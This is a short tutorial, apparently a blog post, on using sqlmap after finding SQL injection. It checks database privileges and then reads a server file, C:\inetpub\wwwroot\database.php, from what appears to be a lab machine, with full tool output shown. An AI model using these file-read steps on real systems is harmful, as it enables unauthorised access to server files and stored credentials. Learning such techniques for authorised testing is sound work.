Hi Guys,
There is a time where you found vulnerability on the server related to SQL injection and want to leverage the attack to get more information from the server.
Basically, SQLMap provide you with capabilities to read file from the server when you have enough privilege. To check wether you have the privilege by using this command
sqlmap -r header-req --current-user --privileges
[*] 'hector'@'localhost' (administrator) [29]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DELETE HISTORY privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
If you see that you have got that FILE privilege then you are able to read some file on the server with this below sample
sqlmap -r header-req --file-read=C:\\inetpub\\wwwroot\\database.php
[18:31:20] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [18:31:20] [INFO] fingerprinting the back-end DBMS operating system [18:31:20] [INFO] the back-end DBMS operating system is Windows [18:31:20] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php' [18:31:21] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done) [18:31:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [18:31:28] [WARNING] unable to retrieve the content of the file 'C:/inetpub/wwwroot/database.php', going to fall-back to simpler UNION technique [18:31:28] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php' do you want confirmation that the remote file 'C:/inetpub/wwwroot/database.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y [18:31:33] [INFO] the local file '/root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php' and the remote file 'C:/inetpub/wwwroot/database.php' have the same size (904 B) files saved to [1]: [*] /root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php (same file) [18:31:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167' [*] ending @ 18:31:33 /2020-05-25/
You can see the file database.php at the specified path was able to be downloaded and stored in our machine.